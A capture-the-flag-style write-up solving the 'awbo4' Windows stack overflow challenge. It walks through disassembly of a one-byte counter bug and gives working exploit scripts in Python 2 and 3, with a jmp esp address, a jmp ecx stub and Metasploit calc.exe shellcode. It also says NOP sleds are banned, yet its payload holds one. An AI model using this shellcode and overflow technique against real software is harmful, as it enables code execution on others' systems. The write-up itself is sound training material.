Advanced Windows Buffer Overflows - Take
Yet another warm summer day in the Basque Country and yet another refreshing take on VRT's very own awbo challenges. Today we will unveil a possible solution for the 3rd test, a.k.a. awbo4. The rules here remain the same as in the others: no NOP sleds, no static stack return addresses. If we feed the binary to IDA we will quickly notice that it doesn't look too complex. The main function just calls one function at 0x00401050, which further analysis shows to be a wrapper that reads user input from stdin. I want to mention at this point that my lack of reversing skills got me stuck on understanding how file input was read; I lost a couple of reversing sessions on it until olly's handle list finally enlightened me.
Once the input vector was clear, the first thing we notice is that the executable parses input to a fixed stack address until char 'A' is read. This seems like a pretty clear textbook example of a stack based buffer overflow, but unfortunately there's a little more voodoo involved than just that.
During execution there are essentially two counters involving the length of the input. The first one lives inside a FILE-like structure and counts how many bytes are actually read from stdin. This input buffer is capped at a maximum of 4096 bytes (0x1000) and cannot be overflowed, as shown here:
.text:00401570 lea eax, [ebp+NumberOfBytesRead]
.text:00401573 push 0 ; lpOverlapped
.text:00401575 push eax ; lpNumberOfBytesRead
.text:00401576 mov eax, [ebx]
.text:00401578 push [ebp+nNumberOfBytesToRead] ; 0x1000
.text:0040157B push ecx ; lpBuffer
.text:0040157C push dword ptr [eax+esi] ; hFile
.text:0040157F call ds:ReadFile
.text:00401585 test eax, eax
.text:00401587 jnz short readStuff
The second one is placed on the stack of the main function. Its layout is unlike what I had encountered in the past: the local frame counter is placed after the buffer into which our input is copied char by char. The funny thing is that at first look we can't write as much as we want, because on every loop iteration the counter is AND'd with 0xFF. But since the devil's in the details, let's look at this:
.text:00401070 mov eax, [ebp-8] ; stack counter
.text:00401073 and eax, 0FFh
.text:00401078 mov cl, [ebp-4]
.text:0040107B mov [ebp+eax-88h], cl ; write into stack buffer
.text:00401082 mov dl, [ebp-8]
.text:00401085 add dl, 1
.text:00401088 mov [ebp-8], dl
.text:0040108B jmp short loop
Notice here that even though eax is capped at each iteration, it is then used as the index into the stack buffer at 0x0040107B. This leads to an interesting situation: we can smash the counter value to write our input wherever we want, as long as the value is not bigger than 0xFF, because the higher bits are clobbered by the AND.
Now that we understand the bug, let's move on to exploitation. There are 128 bytes from the beginning of our input up to the stack counter value. This value is stored as a 4-byte unsigned integer but, as the AND operation showed us, only the lowest byte is used. In the payload, this 4-byte value is followed by the return address. In my particular exploit I decided to put the shellcode and everything else after the return address: although we're really close to the top of the stack, we cannot overflow it far enough to cause an access violation, because the index into the stack buffer is just one byte long and doesn't allow writes past that boundary.
The trick I used here is that even though we can't have our code on the stack, our whole input is stored in the heap. The rules say that we can't use hardcoded addresses, but luck is with us this time: after returning from the main function, ecx points towards the middle of our input in the heap (remember, we've just been processing it). In this situation, we will craft the exploit as follows:
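To make the index arithmetic easier to follow, here is a small Python model of the copy loop. It is only a sketch built from the disassembly shown earlier: it assumes a standard frame (saved ebp at [ebp], return address at [ebp+4]), assumes the terminating 'A' is not itself copied, and the names simulate, COUNTER_OFF and RET_OFF are made up for illustration. Offsets are relative to the start of the stack buffer at ebp-0x88.

```python
# Toy model of the copy loop at 0x00401070..0x0040108B (not the real binary).
BUF = 0x88               # the buffer starts at ebp-0x88
COUNTER_OFF = BUF - 8    # counter at ebp-8 -> offset 0x80 (128)
RET_OFF = BUF + 4        # return address at ebp+4 -> offset 0x8C (assumed frame layout)


def simulate(data, terminator=0x41):
    """Replay the byte-by-byte copy and return a model of the reachable frame."""
    frame = bytearray(0x100)  # offsets 0x00..0xFF are all a one-byte index can reach
    for ch in data:
        if ch == terminator:  # assumption: the loop stops on 'A' without copying it
            break
        index = frame[COUNTER_OFF] & 0xFF  # mov eax, [ebp-8] / and eax, 0FFh
        frame[index] = ch                  # mov [ebp+eax-88h], cl
        # mov dl, [ebp-8] / add dl, 1 / mov [ebp-8], dl (8-bit add, so it wraps)
        frame[COUNTER_OFF] = (frame[COUNTER_OFF] + 1) & 0xFF
    return frame


# 128 filler bytes, one byte that lands on the counter, 3 more fillers,
# then 4 marker bytes standing in for the return address.
frame = simulate(b"B" * 128 + b"\x88" + b"C" * 3 + b"RETN" + b"A")
print(hex(frame[COUNTER_OFF]))              # 0x90
print(bytes(frame[RET_OFF:RET_OFF + 4]))    # b'RETN'
```

Under these assumptions, the byte written at offset 128 replaces the counter with 0x88, the increment turns it into 0x89, and the three filler bytes that follow go to offsets 0x89..0x8B, so the next four bytes land exactly on the return address slot at 0x8C.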
# jmp ecx opcode
jmp_ecx = "\xFF\xE1"
# windows/exec - 148 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
shellcode ="\x31\xc9\xbf\xa3\xd2\x6a\x3d\xb1\x1f\xdd\xc7\xd9\x74\x24"
shellcode +="\xf4\x58\x31\x78\x0f\x83\xc0\x04\x03\x78\xa8\x30\x9f\xc1"
shellcode +="\x46\xf0\x60\x3a\x96\x72\x25\x06\x1d\xf8\xa3\x0e\x20\xee"
shellcode +="\x27\xa1\x3a\x7b\x68\x1e\x3b\x90\xde\xd5\x0f\xed\xe0\x07"
shellcode +="\x5e\x31\x7b\x7b\x24\x71\x08\x83\xe5\xb8\xfc\x8a\x27\xd7"
shellcode +="\x0b\xb7\xf3\x0c\xf0\xbd\x1e\xc7\xa7\x19\xe1\x33\x31\xe9"
shellcode +="\xed\x88\x35\xb2\xf1\x0f\xa1\xc6\x15\x9b\x34\x32\xac\xc7"
shellcode +="\x12\xc0\x6d\xa8\x6b\x3e\x11\x01\xe8\x35\x97\x9d\x7b\x09"
shellcode +="\x1b\x55\x0b\x96\x8e\xe2\x84\xae\x59\x0c\xd7\x6f\x33\xbd"
shellcode +="\xb0\x11\x1b\xdf\x32\x86\x03\xde\x3f\x58\x64\xe0\xa7\x06"
shellcode +="\xeb\x72\x4b\xe7\x8e\xf2\xee\xf7"
# address of a jmp esp instruction in ntdll.dll: 0x78461BE3
ret = "\xE3\x1B\x46\x78"
# print everything so we can pipe it to our executable
print "B"*128+"\x88"+"C"*3+ret+jmp_ecx+"\x90"*50+shellcode+"A"
As you can see, we will overwrite the counter value with 0x88, which will allow the following writes to reach main's return address and beyond. Once we return execution to the stack with the jmp esp instruction, which we located inside ntdll.dll, we execute a jmp ecx instruction that, as I said, will land in the heap where our buffer remains untouched. Also notice the trailing "A", which tells the executable to stop reading user input and exit. As always, the shellcode has been borrowed from Metasploit.com and is just a simple calc.exe launcher. We can pop a nice calculator as follows:
$ ./exp.py | awbo4.exe
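The script above relies on Python 2's print statement and byte strings. For readers on Python 3, the same layout could be assembled roughly as follows. This is a sketch, not the original exploit: build_payload and the constant names are hypothetical, the shellcode has to be supplied by the caller, and the jmp esp address is the one quoted in the post, which is specific to the author's ntdll.dll.

```python
import struct

TERMINATOR = b"A"           # the copy loop stops when it reads this byte
COUNTER_OFFSET = 128        # bytes from the start of the input to the counter
JMP_ECX = b"\xff\xe1"       # jmp ecx opcode, as in the original script
JMP_ESP_ADDR = 0x78461BE3   # jmp esp in ntdll.dll on the author's system


def build_payload(shellcode, ret_addr=JMP_ESP_ADDR):
    """Assemble filler + counter byte + filler + ret + jmp ecx + NOPs + shellcode + 'A'."""
    ret = struct.pack("<I", ret_addr)  # little-endian 32-bit address
    head = b"B" * COUNTER_OFFSET + b"\x88" + b"C" * 3 + ret + JMP_ECX
    # An 'A' inside the head would stop the stack copy before the return
    # address and the jmp ecx stub have been written.
    if TERMINATOR in head:
        raise ValueError("head contains the terminator byte 0x41")
    return head + b"\x90" * 50 + shellcode + TERMINATOR
```

To pipe the result into the executable, write it as raw bytes, for example with sys.stdout.buffer.write(build_payload(shellcode)), since print would re-encode the string under Python 3.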